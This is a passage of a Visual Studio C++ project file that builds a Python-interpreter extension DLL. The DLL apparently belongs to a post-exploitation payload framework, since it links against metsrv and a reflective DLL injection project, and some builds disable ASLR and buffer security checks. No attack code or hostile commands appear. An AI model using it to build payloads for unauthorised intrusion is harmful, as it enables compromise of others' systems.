<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_debug|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\Debug\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;Py_BUILD_CORE;Py_ENABLE_SHARED;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ext_server_python.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ext_server_python.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;Py_BUILD_CORE;Py_ENABLE_SHARED;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ext_server_python.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ext_server_python.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;Py_BUILD_CORE;Py_ENABLE_SHARED;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ext_server_python.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ext_server_python.lib</ImportLibrary>
<TargetMachine>MachineX64</TargetMachine>
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='r7_release|x64'">
<Midl>
<TargetEnvironment>X64</TargetEnvironment>
</Midl>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\python\include;..\..\source\extensions\python\Modules\_ctypes\libffi_msvc;..\..\source\extensions\python\Modules\zlib;..\..\source\extensions\python\PC;..\..\source\extensions\python\Python;..\..\deps\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>HAVE_RAND_EGD;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PYTHON_EXPORTS;Py_BUILD_CORE;Py_ENABLE_SHARED;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<TreatWarningAsError>false</TreatWarningAsError>
<TreatLinkerWarningAsErrors>true</TreatLinkerWarningAsErrors>
</ClCompile>
<Link>
<AdditionalDependencies>gdiplus.lib;backcompat.lib;Netapi32.lib;crypt32.lib;ws2_32.lib;Mpr.lib;metsrv.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>..\backcompat\$(Configuration);..\metsrv\$(Configuration)\$(Platform);..\..\deps\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ext_server_python.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ext_server_python.lib</ImportLibrary>
<TargetMachine>MachineX64</TargetMachine>
<Profile>false</Profile>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.02 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "$(ProjectDir)..\..\output\$(PlatformShortName)\" GOTO COPY
mkdir "$(ProjectDir)..\..\output\$(PlatformShortName)\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\$(PlatformShortName)\"</Command>
</PostBuildEvent>
<ResourceCompile>
<AdditionalIncludeDirectories>..\..\source\extensions\python\include</AdditionalIncludeDirectories>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemGroup>
<ProjectReference Include="..\backcompat\backcompat.vcxproj">
<Project>{c6fb3275-9067-4bba-9206-0a720d2bc64f}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
<ProjectReference Include="..\common\common.vcxproj">
<Project>{9e4de963-873f-4525-a7d0-ce34edbbdcca}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
<ProjectReference Include="..\metsrv\metsrv.vcxproj">
<Project>{37e24f8f-1bd9-490b-8cd2-4768b89e5eab}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
<ProjectReference Include="..\ReflectiveDLLInjection\ReflectiveDLLInjection.vcxproj">
<Project>{72f0246a-a38d-4547-9057-46020e8e503d}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\python\Modules\arraymodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\audioop.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\binascii.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\multibytecodec.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_cn.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_hk.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_iso2022.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_jp.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_kr.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cjkcodecs\_codecs_tw.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cmathmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cPickle.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\cStringIO.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\datetimemodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\errnomodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\future_builtins.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\gcmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\getbuildinfo.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\imageop.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\itertoolsmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\main.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\mathmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\md5.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\md5module.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\mmapmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\operator.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\parsermodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\posixmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\rotatingtree.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\selectmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\sha256module.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\sha512module.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\shamodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\signalmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\socketmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\stropmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\symtablemodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\threadmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\timemodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\unicodedata.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\xxsubtype.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zipimport.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlibmodule.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\adler32.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\compress.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\crc32.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\deflate.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\gzclose.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\gzlib.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\gzread.c" />
<ClCompile Include="..\..\source\extensions\python\Modules\zlib\gzwrite.c" />
